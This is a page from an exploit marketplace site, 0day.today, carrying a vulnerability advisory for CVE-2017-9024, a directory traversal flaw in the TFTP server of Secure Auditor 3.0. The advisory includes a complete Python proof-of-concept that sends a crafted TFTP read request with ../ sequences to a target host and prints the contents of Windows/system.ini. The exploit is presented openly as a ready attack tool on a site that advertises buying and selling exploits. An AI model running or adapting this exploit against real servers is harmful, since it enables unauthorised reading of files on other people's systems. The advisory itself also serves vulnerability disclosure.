0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Secure Auditor 3.0 - Directory Traversal Exploit
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
[+] Credits: John Page aka HYP3RLINX Vendor: ==================== www.secure-bytes.com Product: ===================== Secure Auditor - v3.0 Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases and Cisco devices. Vulnerability Type: =================== Directory Traversal CVE Reference: ============== CVE-2017-9024 Security Issue: ================ Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname. Exploit/POC: ============= import sys,socket print 'Secure Auditor v3.0 / Cisco Config Manager' print 'TFTP Directory Traversal Exploit' print 'Read ../../../../Windows/system.ini POC' print 'hyp3rlinx' HOST = raw_input("[IP]> ") FILE = '../../../../Windows/system.ini' PORT = 69 PAYLOAD = "\x00\x01" #TFTP Read PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal PAYLOAD += "netascii\x00" #TFTP Type s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(PAYLOAD, (HOST, PORT)) out = s.recv(1024) s.close() print "Victim Data located on : %s " %(HOST) print out.strip() # 0day.today [2024-11-16] #